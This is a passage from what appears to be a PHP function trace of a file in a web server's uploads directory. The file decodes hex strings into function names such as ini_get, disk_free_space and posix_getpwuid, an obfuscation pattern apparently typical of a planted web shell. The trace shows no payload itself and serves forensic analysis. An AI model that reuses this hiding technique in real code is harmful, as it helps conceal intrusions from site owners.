3	525	1	0.020251	720808
3	525	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	526	0	0.020281	720800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	526	1	0.020294	720848
3	526	R			95
3	527	0	0.020306	720768	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	527	1	0.020318	720808
3	527	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	528	0	0.020348	720800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	528	1	0.020360	720848
3	528	R			99
3	529	0	0.020372	720768	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	529	1	0.020383	720808
3	529	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	530	0	0.020413	720808	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	530	1	0.020425	720856
3	530	R			108
3	531	0	0.020437	720776	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	531	1	0.020448	720816
3	531	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	532	0	0.020478	720808	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	532	1	0.020490	720856
3	532	R			101
3	533	0	0.020502	720776	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	533	1	0.020513	720816
3	533	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	534	0	0.020543	720808	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	534	1	0.020555	720856
3	534	R			97
3	535	0	0.020568	720776	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	535	1	0.020578	720816
3	535	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	536	0	0.020608	720808	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	536	1	0.020620	720856
3	536	R			110
3	537	0	0.020632	720776	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	537	1	0.020643	720816
3	537	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	513	1	0.020673	720776
2	513	R			'ob_end_clean'
1		A						/var/www/html/uploads/lCT.php	7	$func[27] = 'ob_end_clean'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	538	0	0.020708	720776	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6469726e616d65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 13
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	539	0	0.020748	720808	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	539	1	0.020759	720856
3	539	R			100
3	540	0	0.020772	720776	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	540	1	0.020783	720816
3	540	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	541	0	0.020814	720840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	541	1	0.020828	720888
3	541	R			105
3	542	0	0.020841	720808	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	542	1	0.020855	720848
3	542	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	543	0	0.020887	720840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	543	1	0.020898	720888
3	543	R			114
3	544	0	0.020911	720808	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	544	1	0.020923	720848
3	544	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	545	0	0.020953	720840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	545	1	0.020965	720888
3	545	R			110
3	546	0	0.020977	720808	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	546	1	0.020989	720848
3	546	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	547	0	0.021022	720840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	547	1	0.021034	720888
3	547	R			97
3	548	0	0.021048	720808	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	548	1	0.021059	720848
3	548	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	549	0	0.021116	720840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	549	1	0.021128	720888
3	549	R			109
3	550	0	0.021152	720808	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	550	1	0.021163	720848
3	550	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	551	0	0.021194	720840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	551	1	0.021205	720888
3	551	R			101
3	552	0	0.021218	720808	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	552	1	0.021229	720848
3	552	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	538	1	0.021259	720808
2	538	R			'dirname'
1		A						/var/www/html/uploads/lCT.php	7	$func[28] = 'dirname'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	553	0	0.021293	720808	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6469736b5f746f74616c5f7370616365'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 31
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	554	0	0.021336	720840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	554	1	0.021347	720888
3	554	R			100
3	555	0	0.021360	720808	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	555	1	0.021371	720848
3	555	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	556	0	0.021402	720872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	556	1	0.021414	720920
3	556	R			105
3	557	0	0.021426	720840	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	557	1	0.021437	720880
3	557	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	558	0	0.021467	720872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	558	1	0.021478	720920
3	558	R			115
3	559	0	0.021491	720840	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	559	1	0.021502	720880
3	559	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	560	0	0.021533	720872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6b'
3	560	1	0.021544	720920
3	560	R			107
3	561	0	0.021557	720840	chr	0		/var/www/html/uploads/lCT.php	204	1	107
3	561	1	0.021568	720880
3	561	R			'k'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	562	0	0.021598	720872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	562	1	0.021609	720920
3	562	R			95
3	563	0	0.021622	720840	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	563	1	0.021636	720880
3	563	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	564	0	0.021667	720872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	564	1	0.021678	720920
3	564	R			116
3	565	0	0.021691	720840	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	565	1	0.021703	720880
3	565	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	566	0	0.021733	720872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	566	1	0.021744	720920
3	566	R			111
3	567	0	0.021756	720840	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	567	1	0.021768	720880
3	567	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	568	0	0.021797	720872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	568	1	0.021808	720920
3	568	R			116
3	569	0	0.021821	720840	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	569	1	0.021832	720880
3	569	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	570	0	0.021862	720880	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	570	1	0.021873	720928
3	570	R			97
3	571	0	0.021886	720848	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	571	1	0.021896	720888
3	571	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	572	0	0.021926	720880	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	572	1	0.021937	720928
3	572	R			108
3	573	0	0.021950	720848	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	573	1	0.021962	720888
3	573	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	574	0	0.021991	720880	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	574	1	0.022002	720928
3	574	R			95
3	575	0	0.022015	720848	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	575	1	0.022026	720888
3	575	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	576	0	0.022056	720880	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	576	1	0.022067	720928
3	576	R			115
3	577	0	0.022080	720848	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	577	1	0.022090	720888
3	577	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	578	0	0.022121	720880	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	578	1	0.022132	720928
3	578	R			112
3	579	0	0.022145	720848	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	579	1	0.022156	720888
3	579	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	580	0	0.022186	720880	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	580	1	0.022198	720928
3	580	R			97
3	581	0	0.022210	720848	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	581	1	0.022221	720888
3	581	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	582	0	0.022251	720880	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	582	1	0.022263	720928
3	582	R			99
3	583	0	0.022276	720848	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	583	1	0.022286	720888
3	583	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	584	0	0.022316	720880	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	584	1	0.022327	720928
3	584	R			101
3	585	0	0.022340	720848	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	585	1	0.022351	720888
3	585	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	553	1	0.022389	720856
2	553	R			'disk_total_space'
1		A						/var/www/html/uploads/lCT.php	7	$func[29] = 'disk_total_space'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	586	0	0.022424	720856	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6469736b5f667265655f7370616365'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 29
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	587	0	0.022466	720888	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	587	1	0.022478	720936
3	587	R			100
3	588	0	0.022490	720856	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	588	1	0.022502	720896
3	588	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	589	0	0.022533	720920	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	589	1	0.022544	720968
3	589	R			105
3	590	0	0.022556	720888	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	590	1	0.022567	720928
3	590	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	591	0	0.022598	720920	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	591	1	0.022609	720968
3	591	R			115
3	592	0	0.022622	720888	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	592	1	0.022633	720928
3	592	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	593	0	0.022664	720920	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6b'
3	593	1	0.022675	720968
3	593	R			107
3	594	0	0.022687	720888	chr	0		/var/www/html/uploads/lCT.php	204	1	107
3	594	1	0.022699	720928
3	594	R			'k'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	595	0	0.022729	720920	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	595	1	0.022740	720968
3	595	R			95
3	596	0	0.022752	720888	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	596	1	0.022763	720928
3	596	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	597	0	0.022794	720920	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	597	1	0.022804	720968
3	597	R			102
3	598	0	0.022817	720888	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	598	1	0.022829	720928
3	598	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	599	0	0.022859	720920	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	599	1	0.022870	720968
3	599	R			114
3	600	0	0.022882	720888	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	600	1	0.022893	720928
3	600	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	601	0	0.022923	720920	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	601	1	0.022933	720968
3	601	R			101
3	602	0	0.022946	720888	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	602	1	0.022957	720928
3	602	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	603	0	0.022987	720928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	603	1	0.022998	720976
3	603	R			101
3	604	0	0.023011	720896	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	604	1	0.023021	720936
3	604	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	605	0	0.023051	720928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	605	1	0.023062	720976
3	605	R			95
3	606	0	0.023075	720896	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	606	1	0.023089	720936
3	606	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	607	0	0.023119	720928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	607	1	0.023130	720976
3	607	R			115
3	608	0	0.023142	720896	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	608	1	0.023154	720936
3	608	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	609	0	0.023185	720928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	609	1	0.023196	720976
3	609	R			112
3	610	0	0.023208	720896	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	610	1	0.023219	720936
3	610	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	611	0	0.023249	720928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	611	1	0.023260	720976
3	611	R			97
3	612	0	0.023273	720896	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	612	1	0.023283	720936
3	612	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	613	0	0.023313	720928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	613	1	0.023325	720976
3	613	R			99
3	614	0	0.023337	720896	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	614	1	0.023348	720936
3	614	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	615	0	0.023377	720928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	615	1	0.023388	720976
3	615	R			101
3	616	0	0.023401	720896	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	616	1	0.023412	720936
3	616	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	586	1	0.023442	720896
2	586	R			'disk_free_space'
1		A						/var/www/html/uploads/lCT.php	7	$func[30] = 'disk_free_space'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	617	0	0.023477	720896	dehex	1		/var/www/html/uploads/lCT.php	7	1	'696e695f676574'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 13
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	618	0	0.023518	720928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	618	1	0.023529	720976
3	618	R			105
3	619	0	0.023542	720896	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	619	1	0.023553	720936
3	619	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	620	0	0.023584	720960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	620	1	0.023595	721008
3	620	R			110
3	621	0	0.023608	720928	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	621	1	0.023619	720968
3	621	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	622	0	0.023649	720960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	622	1	0.023661	721008
3	622	R			105
3	623	0	0.023673	720928	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	623	1	0.023685	720968
3	623	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	624	0	0.023715	720960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	624	1	0.023727	721008
3	624	R			95
3	625	0	0.023739	720928	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	625	1	0.023750	720968
3	625	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	626	0	0.023780	720960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	626	1	0.023791	721008
3	626	R			103
3	627	0	0.023804	720928	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	627	1	0.023820	720968
3	627	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	628	0	0.023851	720960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	628	1	0.023862	721008
3	628	R			101
3	629	0	0.023874	720928	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	629	1	0.023886	720968
3	629	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	630	0	0.023915	720960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	630	1	0.023927	721008
3	630	R			116
3	631	0	0.023939	720928	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	631	1	0.023951	720968
3	631	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	617	1	0.023981	720928
2	617	R			'ini_get'
1		A						/var/www/html/uploads/lCT.php	7	$func[31] = 'ini_get'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	632	0	0.024015	720928	dehex	1		/var/www/html/uploads/lCT.php	7	1	'707265675f6d617463685f616c6c'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 27
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	633	0	0.024056	720960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	633	1	0.024068	721008
3	633	R			112
3	634	0	0.024081	720928	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	634	1	0.024092	720968
3	634	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	635	0	0.024123	720992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	635	1	0.024134	721040
3	635	R			114
3	636	0	0.024146	720960	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	636	1	0.024158	721000
3	636	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	637	0	0.024188	720992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	637	1	0.024200	721040
3	637	R			101
3	638	0	0.024212	720960	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	638	1	0.024224	721000
3	638	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	639	0	0.024254	720992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	639	1	0.024265	721040
3	639	R			103
3	640	0	0.024277	720960	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	640	1	0.024288	721000
3	640	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	641	0	0.024318	720992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	641	1	0.024330	721040
3	641	R			95
3	642	0	0.024342	720960	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	642	1	0.024353	721000
3	642	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	643	0	0.024384	720992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	643	1	0.024395	721040
3	643	R			109
3	644	0	0.024408	720960	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	644	1	0.024439	721000
3	644	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	645	0	0.025221	720992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	645	1	0.025246	721040
3	645	R			97
3	646	0	0.025261	720960	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	646	1	0.025273	721000
3	646	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	647	0	0.025309	720992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	647	1	0.025321	721040
3	647	R			116
3	648	0	0.025333	720960	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	648	1	0.025352	721000
3	648	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	649	0	0.025385	721000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	649	1	0.025397	721048
3	649	R			99
3	650	0	0.025409	720968	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	650	1	0.025420	721008
3	650	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	651	0	0.025452	721000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	651	1	0.025464	721048
3	651	R			104
3	652	0	0.025477	720968	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	652	1	0.025488	721008
3	652	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	653	0	0.025518	721000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	653	1	0.025530	721048
3	653	R			95
3	654	0	0.025542	720968	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	654	1	0.025553	721008
3	654	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	655	0	0.025583	721000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	655	1	0.025595	721048
3	655	R			97
3	656	0	0.025608	720968	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	656	1	0.025618	721008
3	656	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	657	0	0.025648	721000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	657	1	0.025659	721048
3	657	R			108
3	658	0	0.025672	720968	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	658	1	0.025683	721008
3	658	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	659	0	0.025712	721000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	659	1	0.025723	721048
3	659	R			108
3	660	0	0.025736	720968	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	660	1	0.025747	721008
3	660	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	632	1	0.025777	720968
2	632	R			'preg_match_all'
1		A						/var/www/html/uploads/lCT.php	7	$func[32] = 'preg_match_all'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	661	0	0.025813	720968	dehex	1		/var/www/html/uploads/lCT.php	7	1	'706f7369785f6765747077756964'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 27
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	662	0	0.025855	721000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	662	1	0.025867	721048
3	662	R			112
3	663	0	0.025880	720968	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	663	1	0.025890	721008
3	663	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	664	0	0.025921	721032	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	664	1	0.025932	721080
3	664	R			111
3	665	0	0.025945	721000	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	665	1	0.025956	721040
3	665	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	666	0	0.025986	721032	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	666	1	0.025997	721080
3	666	R			115
3	667	0	0.026009	721000	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	667	1	0.026020	721040
3	667	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	668	0	0.026050	721032	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	668	1	0.026061	721080
3	668	R			105
3	669	0	0.026073	721000	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	669	1	0.026089	721040
3	669	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	670	0	0.026120	721032	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'78'
